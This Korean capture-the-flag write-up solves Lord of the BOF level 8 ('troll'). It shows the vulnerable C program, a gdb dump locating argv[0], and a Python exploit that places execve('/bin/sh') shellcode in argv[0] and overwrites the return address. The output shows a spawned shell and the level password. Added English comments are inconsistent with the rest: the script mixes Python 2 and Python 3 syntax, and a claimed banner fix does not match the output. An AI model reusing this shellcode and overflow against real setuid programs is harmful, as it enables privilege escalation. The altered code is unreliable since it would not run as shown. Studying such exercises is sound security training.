BOF 원정대 – Level 8 (troll)

이번 문제 소스는 아래와 같다.

/*
 The Lord of the BOF : The Fellowship of the BOF
- troll
- check argc + argv hunter
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;

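/*
 * Level-8 target binary (listing restored: the string-literal quotes were
 * lost in extraction and the implicit-int return type is spelled out).
 *
 * main() copies argv[1] into a fixed 40-byte stack buffer after three
 * checks (argc, a marker byte at offset 47, a 48-byte length cap) and then
 * wipes the environment strings, the buffer and argv[1].  The checks do
 * not remove the underlying defect: the cap admits up to 48 bytes while
 * buffer holds 40, so strcpy() can still write past the end of buffer.
 * The mitigation is a bounded copy sized by sizeof(buffer) (snprintf or
 * strncpy plus explicit NUL) or rejecting anything longer than 39 bytes.
 *
 * Returns 0 after printing the copied argument; exits 0 on any rejected
 * input.
 */
int main(int argc, char *argv[])
{
    char buffer[40];
    int i;

    // here is changed
    if(argc != 2){
        printf("argc must be two!\n");
        exit(0);
    }

    // egghunter: overwrite every environment string in place so nothing
    // placed in the environment survives into the rest of main().
    for(i=0; environ[i]; i++)
        memset(environ[i], 0, strlen(environ[i]));

    // Marker test.  It indexes argv[1] at offset 47 BEFORE the length of
    // argv[1] is checked, so a shorter argument makes this an out-of-bounds
    // read; a robust version checks strlen(argv[1]) first.
    if(argv[1][47] != '\xbf')
    {
        printf("stack is still your friend.\n");
        exit(0);
    }

    // check the length of argument -- 48 is still 8 bytes more than buffer holds
    if(strlen(argv[1]) > 48){
        printf("argument is too long!\n");
        exit(0);
    }

    strcpy(buffer, argv[1]);    /* unbounded copy: up to 48 bytes + NUL into buffer[40] */
    printf("%s\n", buffer);

    // buffer hunter: clear the local buffer once it has been printed
    memset(buffer, 0, 40);

    // one more!: clear the argument string itself
    memset(argv[1], 0, strlen(argv[1]));

    return 0;
}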

환경변수는 사용불가능 하며, argc도 2로 제약하고 있다. 그리고 argv[1]의 크기도 48 Byte만 허용하고 있으므로 이용할 수 있는 부분은 argv[0] 뿐이다. 이곳에 쉘코드를 입력하여 공격해 보도록 하자. 우선 argv[0] 주소를 확인해 보도록 하자.

[orge@localhost orge]$ cp troll `python -c "print 'A'*100"`
[orge@localhost orge]$ gdb AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as i386-redhat-linux...
(gdb) b main
Breakpoint 1 at 0x8048506
(gdb) r
Starting program: /home/orge/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

Breakpoint 1, 0x8048506 in main ()
(gdb) x/32wx $esp
0xbffffa4c: 0x40021ca0 0xbffffa78 0x4000a970 0x400f855b
0xbffffa5c: 0x080496fc 0x4000ae60 0xbffffac4 0xbffffa78
0xbffffa6c: 0x080484eb 0x080496e8 0x080496fc 0xbffffa98
0xbffffa7c: 0x400309cb 0x00000001 0xbffffac4 0xbffffacc
0xbffffa8c: 0x40013868 0x00000001 0x08048450 0x00000000
0xbffffa9c: 0x08048471 0x08048500 0x00000001 0xbffffac4
0xbffffaac: 0x08048390 0x0804866c 0x4000ae60 0xbffffabc
0xbffffabc: 0x40013e90 0x00000001 0xbffffbbb 0x00000000
(gdb) 
0xbffffacc: 0xbffffc2b 0xbffffc3a 0xbffffc51 0xbffffc70
0xbffffadc: 0xbffffc92 0xbffffc9c 0xbffffe5f 0xbffffe7e
0xbffffaec: 0xbffffe98 0xbffffead 0xbffffec9 0xbffffed4
0xbffffafc: 0xbffffee1 0xbffffee9 0xbffffefa 0xbfffff04
0xbffffb0c: 0xbfffff12 0xbfffff23 0xbfffff31 0xbfffff3c
0xbffffb1c: 0xbfffff4c 0x00000000 0x00000003 0x08048034
0xbffffb2c: 0x00000004 0x00000020 0x00000005 0x00000006
0xbffffb3c: 0x00000006 0x00001000 0x00000007 0x40000000
(gdb) 
0xbffffb4c: 0x00000008 0x00000000 0x00000009 0x08048450
0xbffffb5c: 0x0000000b 0x000001fb 0x0000000c 0x000001fb
0xbffffb6c: 0x0000000d 0x000001fb 0x0000000e 0x000001fb
0xbffffb7c: 0x00000010 0x0febfbff 0x0000000f 0xbffffbb6
0xbffffb8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbac: 0x00000000 0x00000000 0x36690000 0x2f003638
0xbffffbbc: 0x656d6f68 0x67726f2f 0x41412f65 0x41414141
(gdb) 
0xbffffbcc: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffbdc: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffbec: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffbfc: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc0c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc1c: 0x41414141 0x41414141 0x41414141 0x50004141
0xbffffc2c: 0x2f3d4457 0x656d6f68 0x67726f2f 0x45520065
0xbffffc3c: 0x45544f4d 0x54534f48 0x3239313d 0x3836312e
(gdb)

argv[0] 주소를 확인하였으니 넉넉잡아 0xbffffbfc 주소를 이용하여 공격을 해보자.

#!/usr/bin/python
import os
from struct import pack

# Raw machine-code payload as a Python 2 byte str; it ends in the literal
# "/bin/sh".  Kept at module level so main() can prepend its NOP sled to it.
shellcode = '\xeb\x1b\x5e\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x89\x74\x24\x01\x89\x44\x24\x05\xb0\x0b\x89\xf3\x8d\x4c\x24\x01\xcd\x80\xe8\xe0\xff\xff\xff/bin/sh'

def main() -> None:
 """Run the target with the two-argument layout worked out above.

 argv[0] is a 100-byte NOP sled followed by ``shellcode``; argv[1] is 44
 filler bytes plus a hard-coded stack address packed little-endian, i.e.
 exactly the 48 bytes the target's length check admits, with 0xbf landing
 at index 47 where the target's marker test looks.  The address
 0xbffffbfc was read off the gdb dump of argv[0] earlier on the page and
 presumably only holds for the same layout (no ASLR, same argument and
 environment sizes) -- it must be re-derived for any other run.
 ``os.execl`` replaces this process image, so nothing after it runs.
 """
 payload1 = '\x90'*100 + shellcode
 payload2 = 'A'*44 + pack('<L', 0xbffffbfc)
 os.execl('/home/orge/troll', payload1, payload2)

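if __name__ == '__main__':
    # Banner typo fixed ("Strat" -> "Start").
    print '[+] Start'
    main()
    # Never reached: on success os.execl() has replaced this process, and on
    # failure it raises OSError instead of returning.
    print '[+] End'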
[orge@localhost orge]$ ./ex.py 
[+] Strat
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

 bash$ id
uid=508(troll) gid=507(orge) egid=508(troll) groups=507(orge)
bash$ my-pass
euid = 508
aspirin
bash$ 
